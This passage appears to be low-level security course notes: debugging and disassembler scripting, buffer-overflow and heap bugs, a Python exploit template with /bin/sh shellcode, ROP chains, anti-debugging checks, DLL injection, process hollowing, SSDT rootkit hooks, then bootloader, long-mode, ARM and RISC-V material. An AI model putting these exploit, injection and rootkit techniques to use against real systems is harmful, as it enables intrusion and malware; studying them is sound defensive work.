class TraceCalls(gdb.Command):
    """Trace function calls"""
    def __init__(self):
        super(TraceCalls, self).__init__("trace-calls", gdb.COMMAND_USER)
    def invoke(self, arg, from_tty):
        gdb.execute("break *0x4004a6")
        gdb.execute("commands\n silent\n print $rax\n continue\n end")
TraceCalls()
Windows debugger commands:
# Set breakpoint
bp kernel32!CreateFileW
# Run
g
# Registers
r
r rax
# Memory
db address # display bytes
dd address # display dwords
dq address # display qwords
# Disassemble
u address
u rip L20 # 20 instructions
# Stack
k # call stack
dv # local variables
User-friendly Windows debugger:
- Graphical interface
- Plugin support
- Scriptable
- Memory map view
- Breakpoint types:
- Software (INT3)
- Hardware (DR0-DR3)
- Memory (guard pages)
Advanced disassembler features:
- Cross-references
- Function identification
- Structure reconstruction
- FLIRT signatures
- Decompiler (Hex-Rays)
IDA Scripting
# IDAPython example (IDA 7.x API names)
import idautils
import idc
for seg in idautils.Segments():
    print(hex(seg), idc.get_segm_name(seg))
for func in idautils.Functions():
    print(hex(func), idc.get_func_name(func))
NSA's open-source reverse engineering tool:
- Java-based GUI
- Decompiler
- Scripting in Java/Python
- Collaborative features
Ghidra Scripts
# Python script in Ghidra
from ghidra.program.model.listing import Function
for func in currentProgram.getListing().getFunctions(True):
    print(func.getName(), hex(func.getEntryPoint().getOffset()))
Static Analysis
Examining code without execution:
- Disassembly
- Control flow graphs
- Data flow analysis
- String references
- Import/export tables
Tools: IDA, Ghidra, radare2, Binary Ninja
Dynamic Analysis
Running code in controlled environment:
- Debugging
- Tracing (strace, ltrace)
- Memory dumps
- API monitoring
- Fuzzing
Tools: GDB, WinDbg, x64dbg, OllyDbg
Hybrid Approach
- Use static to understand structure
- Use dynamic to confirm behavior
- Set breakpoints at interesting locations
- Trace execution paths
Classic vulnerability: writing beyond buffer bounds.
Vulnerable Code
void vulnerable(char *input) {
char buffer[64];
strcpy(buffer, input); // No bounds check!
}
Stack Layout Before Overflow
High addresses
+------------------+
| Return address |
+------------------+
| Saved RBP |
+------------------+
| buffer[63] |
| ... |
| buffer[0] |
+------------------+ <--- RSP
Low addresses
Overflow to Control RIP
; Input crafted to:
; 1. Fill buffer (64 bytes)
; 2. Overwrite saved RBP (8 bytes)
; 3. Overwrite return address with shellcode address
Simple Exploit (32-bit)
# Python exploit template
buffer = "A" * 64 # padding
buffer += "BBBB" # saved EBP (4 bytes on 32-bit)
buffer += "\x60\xa0\x04\x08" # return to shellcode
# Shellcode (execve /bin/sh)
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80"
)
print buffer + shellcode
Heap-based vulnerabilities are more complex.
Heap Structure
Chunk header:
prev_size (if previous free)
size (with flags: PREV_INUSE, IS_MMAPPED)
fd (forward pointer - if free)
bk (backward pointer - if free)
User data...
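Because chunk sizes are multiples of 8 or 16, the low three bits of the size field are free to carry flags. The sketch below decodes such a field, assuming the glibc malloc convention; `NON_MAIN_ARENA` is glibc's third flag bit and is not mentioned in the text above, and `decode_size_field` is an illustrative name.

```python
PREV_INUSE = 0x1      # previous chunk is in use
IS_MMAPPED = 0x2      # chunk was obtained with mmap
NON_MAIN_ARENA = 0x4  # chunk belongs to a non-main arena (glibc-specific)
FLAG_MASK = 0x7


def decode_size_field(raw: int) -> dict:
    """Split a raw chunk size field into the chunk size and its flag bits."""
    return {
        "size": raw & ~FLAG_MASK,
        "prev_inuse": bool(raw & PREV_INUSE),
        "is_mmapped": bool(raw & IS_MMAPPED),
        "non_main_arena": bool(raw & NON_MAIN_ARENA),
    }


print(decode_size_field(0x71))
```

A size field of 0x71, for example, describes a 0x70-byte chunk whose predecessor is still in use.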
Use-After-Free
char *ptr = malloc(100);
free(ptr);
// ... later
strcpy(ptr, "exploit"); // Use after free!
Double Free
char *ptr = malloc(100);
free(ptr);
free(ptr); // Double free - corrupts allocator
Bypass NX/DEP by reusing existing code.
Gadgets
Small instruction sequences ending in ret:
; Find gadgets in binary
pop rax; ret
pop rdi; ret
syscall; ret
mov [rax], rdx; ret
ROP Chain Example
; execve("/bin/sh", NULL, NULL)
; Gadget addresses:
pop_rdi = 0x400123
pop_rsi = 0x400456
pop_rdx = 0x400789
syscall = 0x400abc
binsh = 0x601000 ; address of "/bin/sh" string
; ROP chain on stack:
pop_rdi
binsh
pop_rsi
0
pop_rdx
0
syscall
Basic Shellcode (Linux x86-64)
; execve("/bin/sh", NULL, NULL)
section .text
global _start
_start:
; execve syscall number: 59
push 59
pop rax
; "/bin/sh" string
push 0
mov rbx, 0x0068732f6e69622f ; "/bin/sh" plus a null terminator, stored little-endian
push rbx
mov rdi, rsp ; RDI points to "/bin/sh"
; argv = {rdi, NULL}
xor rsi, rsi ; NULL argv
push rsi
push rdi
mov rsi, rsp ; RSI points to argv
; envp = NULL
xor rdx, rdx
syscall
Null-Free Shellcode
Avoid null bytes that would terminate strings:
; Instead of:
mov eax, 59 ; contains null bytes in 64-bit
; Use:
push 59
pop rax ; no nulls
; Instead of:
mov rbx, 0x68732f6e69622f ; may have nulls
; Use:
xor rbx, rbx
mov bl, 0x2f
shl rbx, 8
...
ASLR (Address Space Layout Randomization)
Randomizes memory addresses:
- Stack
- Heap
- Libraries
- Executable (PIE)
Bypass Techniques
- Information leak: Read memory to find addresses
- Partial overwrite: Modify low bytes only
- Return to PLT: Use known function addresses
- Brute force: 32-bit ASLR can be brute-forced
DEP (Data Execution Prevention)
Marks stack/heap as non-executable.
Bypass with ROP
- Use existing code (no shellcode on stack)
- Chain gadgets to perform actions
- Can call mprotect/VirtualProtect to make memory executable
Example: Call mprotect via ROP
; mprotect(addr, len, PROT_READ|PROT_WRITE|PROT_EXEC)
; Gadgets:
pop_rdi
pop_rsi
pop_rdx
pop_rax
syscall
; ROP chain:
pop_rdi
page_address ; start of shellcode page
pop_rsi
0x1000 ; length
pop_rdx
7 ; PROT_READ|PROT_WRITE|PROT_EXEC
pop_rax
10 ; mprotect syscall
syscall
; then jump to shellcode
Packers compress/encrypt the original executable.
Packed Executable Structure
+------------------+
| Packer stub |
| - decompress |
| - decrypt |
| - resolve imports|
| - jump to OEP |
+------------------+
| Packed original |
| (compressed/ |
| encrypted) |
+------------------+
Detecting Packers
- Section names: UPX0, UPX1, .packed, etc.
- Entropy analysis
- Import table looks suspicious
- Small number of imports
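Entropy analysis from the list above can be illustrated with a short calculation: compressed or encrypted data has a nearly uniform byte distribution, so its Shannon entropy approaches 8 bits per byte. This is a minimal sketch; the function name is illustrative, and the 7.0 threshold in the comment is a common rule of thumb rather than a fixed standard.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((count / total) * math.log2(count / total)
                for count in Counter(data).values())


padding = b"\x00" * 1024             # constant data: lowest possible entropy
uniform = bytes(range(256)) * 4      # every byte value equally likely
print(shannon_entropy(padding), shannon_entropy(uniform))
# Sections scoring above roughly 7.0 are often worth a closer look (assumed threshold).
```

In practice the function would be applied per section of the executable, since a packed payload usually sits in one or two sections next to a low-entropy stub.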
Unpacking Techniques
- Static unpacking: Use unpacker tools
- Dynamic unpacking: Run and dump after unpack
- Manual OEP finding: Set breakpoints on memory access
; Find OEP by breaking on:
; - Return from unpacking routine
; - Access to packed code section
; - API calls (after imports resolved)
IsDebuggerPresent (Windows)
; Check BeingDebugged flag in PEB
mov rax, gs:[60h] ; PEB
mov al, [rax+2] ; BeingDebugged flag
test al, al
jnz being_debugged
NtGlobalFlag (Windows)
; Check NtGlobalFlag in PEB
mov rax, gs:[60h] ; PEB
mov eax, [rax+0BCh] ; NtGlobalFlag (offset 0xBC in the 64-bit PEB; 0x68 in the 32-bit PEB)
; Normal = 0, Debugged = 0x70
Timing Checks
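; Check if single-stepping
rdtsc ; get timestamp
mov ecx, eax ; save low 32 bits of the first reading
; ... some code ... (must preserve ECX)
rdtsc
sub eax, ecx ; elapsed ticks (low 32 bits)
cmp eax, threshold ; if too slow, being debugged
ja being_debugged
INT3 Detection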
; Check for software breakpoints (0xCC)
mov al, [address]
cmp al, 0xCC
je breakpoint_found
PTRACE (Linux)
; Try to ptrace self - can only have one tracer
mov rax, 101 ; ptrace syscall
xor rdi, rdi ; PTRACE_TRACEME
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
cmp rax, -1 ; the raw syscall returns -EPERM (-1) if a tracer is already attached
je being_traced
IAT Hooking
Modify Import Address Table to redirect API calls:
; Original IAT entry points to MessageBoxA
; After hook: points to our function
hook_function:
; Save registers
push rax
; Do malicious stuff
; Call original API
pop rax
jmp original_MessageBoxA
Inline Hooking
Modify function prologue:
; Original function:
MessageBoxA:
mov r10, rcx ; original first instruction
; ...
; After hook (5-byte jmp):
MessageBoxA:
jmp hook_function ; overwrites first 5 bytes
; ... (rest of function after overwritten bytes)
Detours Library (Microsoft)
// Hook function with Detours
PBYTE OriginalMessageBox =
(PBYTE)DetourFindFunction("user32.dll", "MessageBoxA");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalMessageBox, HookedMessageBox);
DetourTransactionCommit();
DLL Injection
// 1. Open target process
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, FALSE, pid);
// 2. Allocate memory in target
LPVOID pRemoteMemory = VirtualAllocEx(
hProcess, NULL, sizeof(dllpath),
MEM_COMMIT, PAGE_READWRITE);
// 3. Write DLL path
WriteProcessMemory(hProcess, pRemoteMemory,
dllpath, sizeof(dllpath), NULL);
// 4. Create remote thread to load DLL
HANDLE hThread = CreateRemoteThread(
hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)LoadLibraryA,
pRemoteMemory, 0, NULL);
Process Hollowing
- Create process in suspended state
- Unmap original executable
- Allocate memory for malicious code
- Write malicious code
- Set entry point and resume
// Create suspended process
CreateProcess(..., CREATE_SUSPENDED, ...);
// Get thread context
GetThreadContext(hThread, &ctx);
// Unmap original executable
NtUnmapViewOfSection(hProcess, ctx.Rdx); // 64-bit
// Allocate memory for new executable
VirtualAllocEx(hProcess, imageBase, ...);
// Write new executable
WriteProcessMemory(...);
// Set new entry point
ctx.Rcx = newEntryPoint;
SetThreadContext(hThread, &ctx);
// Resume thread
ResumeThread(hThread);
Kernel Rootkits
Load as kernel drivers:
- Hook system calls (SSDT)
- Hook interrupt handlers (IDT)
- Filter file system operations
- Hide processes/files
SSDT Hooking
// Save original syscall address
origNtOpenProcess =
(PVOID)KeServiceDescriptorTable->ServiceTable[0x7A];
// Replace with our function
KeServiceDescriptorTable->ServiceTable[0x7A] =
(PVOID)HookNtOpenProcess;
// In hook function
NTSTATUS HookNtOpenProcess(...) {
// Check if caller is allowed
if (IsMalicious(ProcessId))
return STATUS_ACCESS_DENIED;
// Call original
return origNtOpenProcess(...);
}
Bootkits
Infect boot process:
- Master Boot Record (MBR)
- Volume Boot Record (VBR)
- UEFI firmware
MBR Infection
MBR Layout:
Offset 0x000: Boot code (446 bytes)
Offset 0x1BE: Partition table (64 bytes)
Offset 0x1FE: Signature bytes 0x55, 0xAA (the little-endian word 0xAA55)
Bootkit:
- Replace boot code
- Load before OS
- Remain persistent
UEFI Rootkits
More sophisticated:
- Infect UEFI firmware
- Run at highest privilege
- Survive OS reinstall
- Can disable security features
Boot Sequence
- Power-on self-test (POST)
- BIOS initializes hardware
- BIOS searches for bootable devices
- Loads first sector (512 bytes) to 0x7C00
- Jumps to 0x7C00
Boot Sector Layout
Offset 0x000 - 0x1BD: Boot code
Offset 0x1BE - 0x1FD: Partition table
Offset 0x1FE - 0x1FF: Signature bytes 0x55, 0xAA (the little-endian word 0xAA55)
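The layout above can be checked against a raw 512-byte sector. The sketch below validates the signature and decodes the four partition entries, assuming the classic MBR entry format (status byte, CHS start, type byte, CHS end, 32-bit starting LBA, 32-bit sector count). `parse_mbr` is an illustrative name and the sample sector is synthetic.

```python
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE
ENTRY_SIZE = 16


def parse_mbr(sector: bytes) -> list:
    """Validate the boot signature and return the non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR sector is exactly 512 bytes")
    if sector[0x1FE:0x200] != b"\x55\xaa":
        raise ValueError("missing boot signature")
    partitions = []
    for index in range(4):
        offset = PARTITION_TABLE_OFFSET + index * ENTRY_SIZE
        # CHS fields are skipped with pad bytes; only LBA values are decoded.
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, offset)
        if ptype != 0:
            partitions.append({
                "index": index,
                "bootable": status == 0x80,
                "type": ptype,
                "lba_start": lba_start,
                "sectors": sectors,
            })
    return partitions


# Synthetic sector: one bootable partition of type 0x83 starting at LBA 2048.
sample = bytearray(SECTOR_SIZE)
sample[0x1BE:0x1CE] = struct.pack("<B3xB3xII", 0x80, 0x83, 2048, 204800)
sample[0x1FE:0x200] = b"\x55\xaa"
print(parse_mbr(bytes(sample)))
```

To inspect a real disk image, the first 512 bytes of the image file would be passed to `parse_mbr` in place of the synthetic sample.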
Simple Bootloader
; boot.asm - Simple bootloader
[org 0x7C00]
[bits 16]
start:
; Set up segments
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0x7C00
; Print message
mov si, msg
call print_string
; Hang
jmp $
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
msg db "Hello from bootloader!", 13, 10, 0
; Pad to 510 bytes
times 510-($-$$) db 0
dw 0xAA55
Unified Extensible Firmware Interface.
UEFI Applications
// uefi_main.c
#include <efi.h>
#include <efilib.h>
EFI_STATUS
EFIAPI
efi_main(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
InitializeLib(ImageHandle, SystemTable);
Print(L"Hello from UEFI!\n");
return EFI_SUCCESS;
}
UEFI Boot Services
- Memory allocation
- Protocol handlers
- Image loading
- Event handling
UEFI Runtime Services
- Variable services
- Time services
- Reset services
Stage 1: Load Second Stage
; Load more sectors
load_second_stage:
mov ah, 0x02 ; read sectors
mov al, 0x10 ; sectors to read
mov ch, 0 ; cylinder
mov cl, 2 ; sector (1-based)
mov dh, 0 ; head
mov dl, [boot_drive]; drive
mov bx, 0x1000 ; buffer
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Jump to second stage
jmp 0x1000:0x0000
Entering Protected Mode
; Enable A20 line
enable_a20:
in al, 0x92
or al, 2
out 0x92, al
ret
; Load GDT
load_gdt:
cli ; keep interrupts off until a protected-mode IDT is installed
lgdt [gdt_desc]
; Switch to protected mode
mov eax, cr0
or eax, 1
mov cr0, eax
; Far jump to flush pipeline
jmp 0x08:protected_mode
[bits 32]
protected_mode:
mov ax, 0x10 ; data segment
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x90000
GDT for Protected Mode
gdt_start:
; Null descriptor
dq 0
; Code segment
dw 0xFFFF ; limit 0-15
dw 0 ; base 0-15
db 0 ; base 16-23
db 0x9A ; present, ring0, code, readable
db 0xCF ; 4KB granularity, 32-bit, limit 16-19
db 0 ; base 24-31
; Data segment
dw 0xFFFF
dw 0
db 0
db 0x92 ; present, ring0, data, writable
db 0xCF
db 0
gdt_end:
gdt_desc:
dw gdt_end - gdt_start - 1
dd gdt_start
Switching to 64-bit Long Mode
; Check for long mode support
check_long_mode:
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb no_long_mode
mov eax, 0x80000001
cpuid
test edx, 1 << 29 ; LM bit
jz no_long_mode
ret
; Set up paging
setup_paging:
; Clear page tables
mov edi, 0x1000
mov cr3, edi
xor eax, eax
mov ecx, 4096
rep stosd
; Set up PML4
mov edi, cr3
mov dword [edi], 0x2003 ; PDPT at 0x2000, present/write
; Set up PDPT
mov edi, 0x2000
mov dword [edi], 0x3003 ; PD at 0x3000, present/write
; Set up PD
mov edi, 0x3000
mov dword [edi], 0x4003 ; PT at 0x4000, present/write
; Set up PT (identity map first 2MB)
mov edi, 0x4000
mov eax, 3 ; present/write
mov ecx, 512
.map_2mb:
mov [edi], eax
add eax, 0x1000
add edi, 8
loop .map_2mb
ret
; Enable long mode
enable_long_mode:
; Enable PAE
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
; Set EFER.LME
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
; Enable paging
mov eax, cr0
or eax, 1 << 31
mov cr0, eax
ret
IDT Setup in Long Mode
; Set up IDT entry
; RDI = index, RSI = handler address, RDX = type/attribute byte (e.g. 0x8E)
setup_idt_entry:
push rbp
mov rbp, rsp
; Calculate entry address
shl rdi, 4 ; each entry is 16 bytes
add rdi, idt_base
; Offset bits 0-15
mov [rdi], si
; Code segment selector (assumes 0x08)
mov word [rdi+2], 0x08
; IST index (0 = unused)
mov byte [rdi+4], 0
; Type and attributes (0x8E = present, ring 0, interrupt gate)
mov [rdi+5], dl
; Offset bits 16-31
shr rsi, 16
mov [rdi+6], si
; Offset bits 32-63
shr rsi, 16
mov [rdi+8], esi
; Reserved
mov dword [rdi+12], 0
pop rbp
ret
Interrupt Handler Template
; Common interrupt handler stub
interrupt_handler:
; Save all registers
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push rbp
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
; Call C handler
mov rdi, [rsp+120] ; interrupt number
mov rsi, rsp ; register frame
call c_handler
; Restore registers
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rbp
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
iretq
GDT for Long Mode
; Long mode GDT
gdt64:
dq 0 ; null descriptor
dq 0x0020980000000000 ; 64-bit code segment
dq 0x0000920000000000 ; 64-bit data segment
gdt64_desc:
dw $ - gdt64 - 1
dq gdt64
Task State Segment (TSS)
; TSS structure
struc tss
.reserved1 resd 1
.rsp0 resq 1 ; stack for ring 0
.rsp1 resq 1 ; stack for ring 1
.rsp2 resq 1 ; stack for ring 2
.reserved2 resq 1
.ist1 resq 1 ; interrupt stack table
.ist2 resq 1
.ist3 resq 1
.ist4 resq 1
.ist5 resq 1
.ist6 resq 1
.ist7 resq 1
.reserved3 resq 1
.reserved4 resw 1
.iomap resw 1 ; I/O map base
endstruc ; 104 bytes in total
; Load TSS
load_tss:
mov ax, 0x28 ; TSS segment selector
ltr ax
ret
Identity Mapping
; Identity map the first 1GB using 2MB pages
identity_map:
; PML4 entry points to PDPT
mov rax, 0x2000
or rax, 3 ; present, writable
mov [0x1000], rax
; PDPT entry points to PD
mov rax, 0x3000
or rax, 3
mov [0x2000], rax
; PD entries (512 * 2MB = 1GB)
mov rdi, 0x3000
mov rax, 0x83 ; present, writable, huge page
mov rcx, 512
.map_pd:
mov [rdi], rax
add rax, 0x200000 ; next 2MB
add rdi, 8
loop .map_pd
ret
Page Fault Handler
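page_fault_handler:
; Save the registers used here (a full handler saves every register
; that alloc_page and map_page may clobber)
push rax
push rdi
push rsi
; Check if address is valid
; (simplified - just allocate page)
; Allocate physical page
call alloc_page
mov rsi, rax ; physical address returned by alloc_page
; Get faulting address from CR2, rounded down to its page
mov rdi, cr2 ; virtual address
and rdi, ~0xFFF
; Map page at faulting address
call map_page
pop rsi
pop rdi
pop rax
; Discard the error code the CPU pushed for the page fault
add rsp, 8
; Return from fault (instruction will be retried)
iretq
Software Task Switching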
; Save current task context
save_context:
; Save registers to TSS or task structure
mov [task_struct + Task.rax], rax
mov [task_struct + Task.rbx], rbx
; ... save others
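; Save stack pointer as it was in the caller (skip our own return address)
lea rax, [rsp+8]
mov [task_struct + Task.rsp], rax
; Save instruction pointer: the caller's return address is the resume point
mov rax, [rsp+8]
mov [task_struct + Task.rip], rax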
ret
; Switch to next task
switch_task:
; Save current
call save_context
; Select next task (simplified round-robin)
mov rax, [current_task]
inc rax
cmp rax, [task_count]
jl .set_current
xor rax, rax
.set_current:
mov [current_task], rax
; Load new task
mov rbx, [task_list + rax*8]
; Restore stack
mov rsp, [rbx + Task.rsp]
; Restore other registers
mov rax, [rbx + Task.rax]
mov rbx, [rbx + Task.rbx]
; ... restore others
; Jump to saved instruction pointer
ret
PCI Configuration
; Read PCI config space
; EDI = bus:device:function, ESI = offset
pci_read_config:
mov eax, 0x80000000
or eax, edi ; bus:device:function
or eax, esi ; offset
mov dx, 0xCF8
out dx, eax
mov dx, 0xCFC
in eax, dx
ret
; Write PCI config space
pci_write_config:
push rax
mov eax, 0x80000000
or eax, edi
or eax, esi
mov dx, 0xCF8
out dx, eax
pop rax
mov dx, 0xCFC
out dx, eax
ret
Simple UART Driver
; COM1 base address
COM1 equ 0x3F8
; Initialize UART
uart_init:
; Set baud rate divisor
mov dx, COM1 + 3 ; line control register
mov al, 0x80 ; enable DLAB
out dx, al
mov dx, COM1 ; divisor low
mov al, 1 ; 115200 baud
out dx, al
mov dx, COM1 + 1 ; divisor high
xor al, al
out dx, al
; Set line parameters
mov dx, COM1 + 3
mov al, 3 ; 8 bits, no parity, 1 stop
out dx, al
; Enable FIFO
mov dx, COM1 + 2
mov al, 0xC7
out dx, al
ret
; Send character
uart_putc:
push rax
mov dx, COM1 + 5 ; line status
.wait:
in al, dx
test al, 0x20 ; transmitter holding register empty?
jz .wait
pop rax
mov dx, COM1
out dx, al
ret
Key Differences
| Feature | ARM | x86 |
|---|---|---|
| Instruction set | RISC | CISC |
| Registers | 16-32 general purpose | 8-16 general purpose |
| Instruction length | Fixed (32/16-bit) | Variable |
| Addressing | Load-store | Memory operands |
| Conditionals | Conditional execution | Conditional jumps |
| Endianness | Bi-endian | Little-endian |
ARM32 (AArch32)
R0-R3: Argument/scratch registers
R4-R11: Callee-saved registers
R12: IP (intra-procedure scratch)
R13: SP (stack pointer)
R14: LR (link register)
R15: PC (program counter)
CPSR: Current Program Status Register
N: Negative flag
Z: Zero flag
C: Carry flag
V: Overflow flag
I: IRQ disable
F: FIQ disable
T: Thumb state
M: Mode bits
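How the N, Z, C and V flags come out of a comparison is easy to get wrong, because on ARM the carry flag after a subtraction means "no borrow". The following sketch models a 32-bit `CMP` in C. The type `nzcv_t`, the enum `arm_cond_t` and both function names are hypothetical and only serve the illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative container for the four condition flags. */
typedef struct { unsigned n, z, c, v; } nzcv_t;

typedef enum { COND_EQ, COND_NE, COND_GT, COND_LT } arm_cond_t;

/* Flags produced by CMP a, b (that is, a - b with the result discarded). */
static nzcv_t arm_cmp_flags(uint32_t a, uint32_t b)
{
    uint32_t r = a - b;
    nzcv_t f;
    f.n = r >> 31;                     /* result is negative */
    f.z = (r == 0);                    /* result is zero */
    f.c = (a >= b);                    /* carry = NOT borrow */
    f.v = ((a ^ b) & (a ^ r)) >> 31;   /* signed overflow */
    return f;
}

/* Evaluate a condition code against the flags. */
static int arm_cond_holds(nzcv_t f, arm_cond_t cond)
{
    switch (cond) {
    case COND_EQ: return f.z == 1;
    case COND_NE: return f.z == 0;
    case COND_GT: return f.z == 0 && f.n == f.v; /* signed greater than */
    case COND_LT: return f.n != f.v;             /* signed less than */
    }
    assert(0 && "unknown condition");
    return 0;
}
```

The signed conditions compare N with V rather than looking at N alone, so they stay correct even when the subtraction overflows.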
ARM64 (AArch64)
X0-X7: Argument/result registers
X8: Indirect result location register
X9-X15: Temporary registers
X16-X17: Intra-procedure scratch
X18: Platform register
X19-X28: Callee-saved
X29: FP (frame pointer)
X30: LR (link register)
SP: Stack pointer
PC: Program counter
NZCV: Condition flags (in PSTATE)
Data Processing Instructions
; Arithmetic
ADD R0, R1, R2 ; R0 = R1 + R2
SUB R0, R1, R2 ; R0 = R1 - R2
RSB R0, R1, R2 ; R0 = R2 - R1 (reverse subtract)
; Logical
AND R0, R1, R2 ; R0 = R1 & R2
ORR R0, R1, R2 ; R0 = R1 | R2
EOR R0, R1, R2 ; R0 = R1 ^ R2
BIC R0, R1, R2 ; R0 = R1 & ~R2
; Move
MOV R0, #42 ; R0 = 42
MVN R0, R1 ; R0 = ~R1
; Compare (set flags only)
CMP R0, R1 ; set flags based on R0 - R1
CMN R0, R1 ; set flags based on R0 + R1
TST R0, R1 ; set flags based on R0 & R1
TEQ R0, R1 ; set flags based on R0 ^ R1
Load/Store Instructions
; Single register
LDR R0, [R1] ; R0 = *R1
STR R0, [R1] ; *R1 = R0
; With offset
LDR R0, [R1, #4] ; R0 = *(R1 + 4)
LDR R0, [R1, R2] ; R0 = *(R1 + R2)
LDR R0, [R1, R2, LSL #2] ; R0 = *(R1 + (R2<<2))
; Pre-indexed
LDR R0, [R1, #4]! ; R1 += 4, then R0 = *R1
; Post-indexed
LDR R0, [R1], #4 ; R0 = *R1, then R1 += 4
; Multiple registers
LDMIA R0!, {R1-R4} ; Load multiple, increment after
STMDB R0!, {R1-R4} ; Store multiple, decrement before
Branch Instructions
B label ; unconditional branch
BL label ; branch and link (call)
BX R0 ; branch and exchange to register
BLX R0 ; branch with link and exchange
; Conditional branches
BEQ label ; branch if equal (Z=1)
BNE label ; branch if not equal (Z=0)
BGT label ; branch if greater than (signed)
BLT label ; branch if less than (signed)
16-bit compressed instruction set.
Thumb vs ARM
; ARM mode (32-bit)
ADD R0, R1, R2 ; 4 bytes
; Thumb mode (16-bit)
ADD R0, R1 ; R0 += R1 (2 bytes)
Thumb-2
Mixed 16/32-bit instructions:
IT EQ ; If-Then (makes the next 1-4 instructions conditional)
ADDEQ R0, R1 ; inside the IT block: executed only if EQ
ADD R2, R3 ; not part of the IT block: always executed
AArch64 Instructions
; Data processing
ADD X0, X1, X2 ; X0 = X1 + X2
SUB X0, X1, X2 ; X0 = X1 - X2
AND X0, X1, X2 ; X0 = X1 & X2
; Load/store
LDR X0, [X1] ; X0 = *X1
STR X0, [X1] ; *X1 = X0
LDP X0, X1, [X2] ; load pair
; Branches
B label ; unconditional
BL label ; branch with link
RET ; return from function
Function Call Example
; int add(int a, int b) { return a + b; }
add:
ADD W0, W0, W1 ; W0 = W0 + W1 (32-bit)
RET
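; int main() { return add(5, 3); }
main:
STP X29, X30, [SP, #-16]! ; save FP and LR (BL overwrites X30)
MOV W0, #5 ; first argument
MOV W1, #3 ; second argument
BL add ; call add
LDP X29, X30, [SP], #16 ; restore FP and LR
RET ; return (result is already in W0)
Design Philosophy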
- Clean-slate design
- Open ISA
- Modular extensions
- Suitable for all implementations
Base Integer ISA (RV32I/RV64I)
- 32-bit (RV32I) or 64-bit (RV64I)
- 32 registers (x0-x31)
- Simple load-store architecture
- Few instruction formats
R-Type (Register-Register)
funct7 | rs2 | rs1 | funct3 | rd | opcode
7 bits |5 bits|5 bits|3 bits|5 bits|7 bits
Example: ADD x1, x2, x3
I-Type (Immediate)
immediate[11:0] | rs1 | funct3 | rd | opcode
12 bits |5 bits|3 bits|5 bits|7 bits
Example: ADDI x1, x2, 100
S-Type (Store)
imm[11:5] | rs2 | rs1 | funct3 | imm[4:0] | opcode
7 bits |5 bits|5 bits|3 bits| 5 bits |7 bits
Example: SW x1, 100(x2)
B-Type (Branch)
imm[12,10:5] | rs2 | rs1 | funct3 | imm[4:1,11] | opcode
7 bits |5 bits|5 bits|3 bits| 5 bits |7 bits
Example: BEQ x1, x2, label
U-Type (Upper Immediate)
immediate[31:12] | rd | opcode
20 bits |5 bits|7 bits
Example: LUI x1, 0x12345
J-Type (Jump)
immediate[20,10:1,11,19:12] | rd | opcode
20 bits |5 bits|7 bits
Example: JAL x1, label
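To make the field layouts concrete, the sketch below packs the R-type and I-type formats into 32-bit words. The function names are hypothetical. The opcode and funct values used in the usage note (0x33 for register-register ALU operations, 0x13 for immediate ALU operations) are the standard RV32I values.

```c
#include <assert.h>
#include <stdint.h>

/* R-type: funct7 | rs2 | rs1 | funct3 | rd | opcode */
static uint32_t rv_encode_r(uint32_t funct7, uint32_t rs2, uint32_t rs1,
                            uint32_t funct3, uint32_t rd, uint32_t opcode)
{
    assert(funct7 < 128 && rs2 < 32 && rs1 < 32);
    assert(funct3 < 8 && rd < 32 && opcode < 128);
    return (funct7 << 25) | (rs2 << 20) | (rs1 << 15) |
           (funct3 << 12) | (rd << 7) | opcode;
}

/* I-type: imm[11:0] | rs1 | funct3 | rd | opcode */
static uint32_t rv_encode_i(int32_t imm, uint32_t rs1, uint32_t funct3,
                            uint32_t rd, uint32_t opcode)
{
    assert(imm >= -2048 && imm <= 2047); /* 12-bit signed immediate */
    assert(rs1 < 32 && funct3 < 8 && rd < 32 && opcode < 128);
    return (((uint32_t)imm & 0xFFFu) << 20) | (rs1 << 15) |
           (funct3 << 12) | (rd << 7) | opcode;
}

/* Recover the sign-extended immediate from an I-type instruction word. */
static int32_t rv_decode_i_imm(uint32_t insn)
{
    int32_t imm = (int32_t)((insn >> 20) & 0xFFFu);
    if (imm & 0x800)
        imm -= 0x1000; /* sign-extend bit 11 */
    return imm;
}
```

With these helpers, `rv_encode_r(0, 3, 2, 0, 1, 0x33)` yields the word for `ADD x1, x2, x3` and `rv_encode_i(100, 2, 0, 1, 0x13)` the word for `ADDI x1, x2, 100`.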
Control and Status Registers.
Common CSRs
mstatus: Machine status
mtvec: Machine trap handler base
mepc: Machine exception PC
mcause: Machine exception cause
mtval: Machine trap value
mip: Machine interrupt pending
mie: Machine interrupt enable
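A trap handler usually starts by splitting `mcause` into its two parts: the top bit says whether the trap was an interrupt, and the remaining bits carry the cause code. A minimal sketch for RV32 follows. The type `mcause_t` and the function names are hypothetical, and only a handful of the standard cause codes are listed.

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative decoded form of an RV32 mcause value. */
typedef struct {
    int      is_interrupt; /* 1 = interrupt, 0 = synchronous exception */
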